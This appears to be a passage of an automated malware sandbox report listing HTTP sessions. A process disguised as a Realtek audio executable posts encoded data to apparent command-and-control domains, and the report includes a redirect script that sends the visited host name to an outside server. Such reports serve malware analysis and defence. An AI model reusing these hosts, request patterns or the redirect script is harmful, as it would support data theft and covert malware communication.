                                                                                                                                                                              Data Raw: 69 53 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 58 75 65 58 6d 6a 50 73 5a 6d 73 6d 78 4b 73 2b 47 78 63 54 63 35 73 68 4d 4c 2b 2f 57 6d 49 61 49 6b 4d 77 77 4b 68 67 37 55 6a 45 59 53 48 65 37 43 62 73 45 56 30 78 6c 43 55 6c 6f 52 33 4c 41 62 54 62 4f 43 74 2f 4c 75 30 52 49 6e 74 38 42 73 59 6c 6b 59 6f 73 6a 43 7a 4d 79 74 4d 79 46 4e 33 68 36 53 58 44 63 71 4c 54 38 49 68 4e 44 31 75 75 6f 79 48 47 78 72 54 62 2f 46 46 5a 4a 63 37 4f 75 6e 6c 39 58 4e 48 35 4d 4c 44 49 78 39 67 38 36 6b 70 78 6a 4c 46 41 79 47 52 44 33 48 31 68 6d 77 37 34 4c 75 47 63 57 6a 70 6f 36 78 75 5a 65 41 3d 3d
                                                                                                                                                                              Data Ascii: iS=6zXbcNT7Su38XueXmjPsZmsmxKs+GxcTc5shML+/WmIaIkMwwKhg7UjEYSHe7CbsEV0xlCUloR3LAbTbOCt/Lu0RInt8BsYlkYosjCzMytMyFN3h6SXDcqLT8IhND1uuoyHGxrTb/FFZJc7Ounl9XNH5MLDIx9g86kpxjLFAyGRD3H1hmw74LuGcWjpo6xuZeA==
                                                                                                                                                                              Jan 11, 2025 03:55:15.332195044 CET533INHTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              6192.168.11.204976427.124.4.246806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:17.850078106 CET775OUTPOST /n2c9/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              Origin: http://www.laohub10.net
                                                                                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 59 75 75 58 72 67 58 73 52 6d 73 6c 30 4b 73 2b 4d 52 63 58 63 35 6f 68 4d 4f 65 57 58 55 38 61 4a 47 55 77 78 49 4a 67 34 55 6a 45 51 79 48 62 31 69 62 33 45 56 6f 54 6c 48 38 6c 6f 52 6a 4c 41 61 6a 62 4a 31 35 38 4c 2b 30 54 4f 6e 74 2b 4f 4d 59 6c 6b 59 6f 73 6a 43 57 72 79 74 45 79 46 64 6e 68 34 7a 58 43 48 4b 4c 55 73 59 68 4e 48 31 75 71 6f 79 48 6b 78 71 66 68 2f 41 42 5a 4a 5a 58 4f 75 32 6c 36 5a 4e 48 2f 52 62 43 5a 33 50 31 6a 35 41 59 5a 6e 49 56 6d 71 6b 78 55 79 52 34 37 37 43 50 63 49 39 61 75 53 54 51 41 34 7a 76 43 44 42 47 6f 67 34 66 44 70 59 55 64 64 38 36 37 6e 41 42 54 5a 46 6f 3d
                                                                                                                                                                              Data Ascii: iS=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXU8aJGUwxIJg4UjEQyHb1ib3EVoTlH8loRjLAajbJ158L+0TOnt+OMYlkYosjCWrytEyFdnh4zXCHKLUsYhNH1uqoyHkxqfh/ABZJZXOu2l6ZNH/RbCZ3P1j5AYZnIVmqkxUyR477CPcI9auSTQA4zvCDBGog4fDpYUdd867nABTZFo=
                                                                                                                                                                              Jan 11, 2025 03:55:18.143449068 CET533INHTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              7192.168.11.204976527.124.4.246806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:20.675431013 CET2578OUTPOST /n2c9/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              Origin: http://www.laohub10.net
                                                                                                                                                                              Referer: http://www.laohub10.net/n2c9/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 59 75 75 58 72 67 58 73 52 6d 73 6c 30 4b 73 2b 4d 52 63 58 63 35 6f 68 4d 4f 65 57 58 55 6b 61 4a 31 63 77 7a 70 4a 67 35 55 6a 45 61 53 48 61 31 69 62 36 45 56 67 58 6c 48 78 48 6f 54 62 4c 43 38 33 62 4d 41 56 38 42 2b 30 54 43 48 74 2f 42 73 59 77 6b 59 5a 72 6a 43 47 72 79 74 45 79 46 59 72 68 38 69 58 43 46 4b 4c 54 38 49 68 42 44 31 75 4f 6f 79 66 4f 78 71 62 78 2f 7a 4a 5a 49 34 37 4f 6f 41 52 36 47 39 48 39 51 62 43 42 33 50 70 47 35 47 39 33 6e 4d 64 59 71 6c 31 55 79 56 49 67 38 68 47 45 56 2f 61 62 4f 68 55 6b 75 7a 6a 39 49 67 2b 71 67 65 50 68 72 74 30 33 58 71 72 77 36 78 52 62 50 78 41 70 49 4a 36 4b 53 6b 4d 6c 53 4a 61 33 46 31 52 4d 6d 34 54 68 73 66 43 70 50 59 4d 32 31 4a 33 45 61 68 69 6d 70 45 61 45 6a 4e 54 58 2b 71 78 37 6d 43 43 34 50 4e 42 35 4c 4d 70 6f 6a 6a 47 76 53 7a 53 35 58 35 79 54 52 56 4c 45 66 71 46 4b 48 55 5a 70 67 57 6e 2f 54 53 51 44 68 52 71 75 5a 54 45 6c 54 48 74 51 6c 77 33 6d 59 65 31 34 59 42 31 39 42 37 6b [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXUkaJ1cwzpJg5UjEaSHa1ib6EVgXlHxHoTbLC83bMAV8B+0TCHt/BsYwkYZrjCGrytEyFYrh8iXCFKLT8IhBD1uOoyfOxqbx/zJZI47OoAR6G9H9QbCB3PpG5G93nMdYql1UyVIg8hGEV/abOhUkuzj9Ig+qgePhrt03Xqrw6xRbPxApIJ6KSkMlSJa3F1RMm4ThsfCpPYM21J3EahimpEaEjNTX+qx7mCC4PNB5LMpojjGvSzS5X5yTRVLEfqFKHUZpgWn/TSQDhRquZTElTHtQlw3mYe14YB19B7kVyRiKZqqaiJxStI2LgVQOMnrLuTKL65m0ics2qhqlK9+4hP7Tp86EWXuG8uHUdNZVoZYhQsu4wRn7LqsvFISv4//nhY5K3XLP8aFhL+faYNKCqsmYuSbuyzgBA1xTFAOzJXOPg2o9alaLoUIgdyU45fW3Dfi+rer9rvAUWiVpEGT21Hy+Us5bQFOkuI4ZhaYsd6GLjkBdc8dLIkYPE2UzcvIMg63h9q1NKtlZ7eT5Q3XhgyjNswi35R4ujEQeV6k2VKNN9KPBZjJV61s2Pu8njQXi9zv3OGuPsQza1FDn6I8Gr2vzw6PDpubGSYVpBOuDbcme9w2542znVtGy1AwNaqib0oUBKQpLgVqYJHR7btsAEiyioMUtPwaY+/1znV3holpJsfG9MFymdF4a9V2Xuz9wl+mi5uK6gpuNJHB5KTtMH64RWSHdAHx10TCbGuQYdusiQBqTbAyKQU3e40cqR3Q90P/7f6H8T2uhfPI4R53DFw+2XGmdoZvHk2bsZ2x/mKltXS1R7uMlvv/QCB3+emtMpo6XHVAaKBwb56yAta7jHHSlMklUaFzPcjNhUdvtbp45Zu55zxrWSOYU0+JTK3t4mMncI4StYRToop0FZK5bneIV4I8cq8Q+KtovoKt5yMHcCoaw8h7smbtEiRrFCH/DEAAZnqxgP [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:55:20.675496101 CET5346OUTData Raw: 57 5a 6f 37 5a 73 6d 2b 67 67 6a 39 71 55 56 59 38 6f 4f 46 68 37 32 68 67 50 6d 58 58 70 2b 72 72 33 5a 52 34 69 51 54 56 6a 71 63 4a 4d 55 4a 32 42 49 2f 5a 54 6f 43 54 43 6a 61 62 44 4e 43 45 52 57 4d 6f 55 39 30 79 6a 74 4f 42 6b 4d 6e 61 30
                                                                                                                                                                              Data Ascii: WZo7Zsm+ggj9qUVY8oOFh72hgPmXXp+rr3ZR4iQTVjqcJMUJ2BI/ZToCTCjabDNCERWMoU90yjtOBkMna0MNMLH5fYs9AwhBMgY3jGoV5RVZDyZuP1THFYhVJ7thHyXdJMRwHCuOfFQTl2jNZryRpd/gOsxIlPphoYURRWmGk1jeTX3oMDKCf6J/lv3Rqc/3/xFzwn5zMGGlxDvmjjEKG3SOH06Zo6eDJhP1T0jJHuoOMw4vNr3
                                                                                                                                                                              Jan 11, 2025 03:55:20.967662096 CET533INHTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              8192.168.11.204976627.124.4.246806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:23.510467052 CET487OUTGET /n2c9/?iS=3x/7f4nzUvf4SsmqzFnTfg9SxMMmEiloZs8QEOaGeCkTK2Ae1JBrg2z7Qirl6WfPBEFIuXRetS7qNq3tJgV/JudJBWlXSOQ4g5lNoHOvpN8KebvqySaeOvo=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:55:23.806381941 CET533INHTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              9192.168.11.204976746.30.211.38806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:29.402589083 CET761OUTPOST /uf7y/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              Origin: http://www.bankseedz.info
                                                                                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 6f 72 59 56 50 2b 49 38 54 31 4a 78 35 76 6f 44 78 6d 33 75 6e 6c 48 68 4e 6b 4c 36 6b 74 57 76 55 37 76 64 74 4a 4c 70 41 45 45 32 6d 45 48 58 50 77 67 66 41 6f 4b 62 6a 2b 4e 69 61 61 36 72 75 45 4d 66 31 4f 38 7a 36 59 70 4c 6e 65 53 58 4f 45 4a 43 47 51 45 2b 35 6d 67 44 39 51 66 42 58 35 7a 32 46 32 33 69 76 4f 31 4e 79 5a 67 68 64 6d 33 49 71 59 41 52 6d 6f 34 52 34 44 30 6d 4b 32 57 36 37 65 56 46 4a 4f 47 34 64 4b 76 79 5a 36 35 6f 72 33 56 54 59 6a 6e 4c 61 68 39 46 6e 6d 72 73 39 6d 46 34 70 6e 49 32 42 66 6b 47 4e 43 6f 58 71 41 3d 3d
                                                                                                                                                                              Data Ascii: iS=a+/R7g38sexoorYVP+I8T1Jx5voDxm3unlHhNkL6ktWvU7vdtJLpAEE2mEHXPwgfAoKbj+Niaa6ruEMf1O8z6YpLneSXOEJCGQE+5mgD9QfBX5z2F23ivO1NyZghdm3IqYARmo4R4D0mK2W67eVFJOG4dKvyZ65or3VTYjnLah9Fnmrs9mF4pnI2BfkGNCoXqA==
                                                                                                                                                                              Jan 11, 2025 03:55:29.635735035 CET738INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:29 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              10192.168.11.204976846.30.211.38806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:55:32.163706064 CET781OUTPOST /uf7y/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              Origin: http://www.bankseedz.info
                                                                                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 62 6d 76 55 62 66 64 73 49 4c 70 4f 6b 45 32 31 45 48 57 58 51 67 41 41 6f 50 6d 6a 2b 78 69 61 61 75 72 75 42 6f 66 31 39 55 77 72 59 70 4a 76 2b 53 56 4b 45 4a 43 47 51 45 2b 35 6d 6c 4c 39 51 48 42 58 49 44 32 58 45 66 6a 7a 65 31 4f 7a 5a 67 68 5a 6d 32 67 71 59 41 2f 6d 70 6b 33 34 46 77 6d 4b 7a 53 36 37 72 70 4b 65 65 47 45 5a 4b 75 57 55 61 45 4b 6b 48 31 62 53 67 4f 59 64 6a 68 59 6d 77 6d 32 67 55 78 63 71 30 55 45 46 76 64 75 50 41 70 4d 33 47 52 6a 65 49 4d 30 2b 4e 32 4d 65 5a 4c 36 39 33 55 58 2f 6b 6b 3d
                                                                                                                                                                              Data Ascii: iS=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnbmvUbfdsILpOkE21EHWXQgAAoPmj+xiaauruBof19UwrYpJv+SVKEJCGQE+5mlL9QHBXID2XEfjze1OzZghZm2gqYA/mpk34FwmKzS67rpKeeGEZKuWUaEKkH1bSgOYdjhYmwm2gUxcq0UEFvduPApM3GRjeIM0+N2MeZL693UX/kk=
                                                                                                                                                                              Jan 11, 2025 03:55:32.403798103 CET738INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:55:32 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
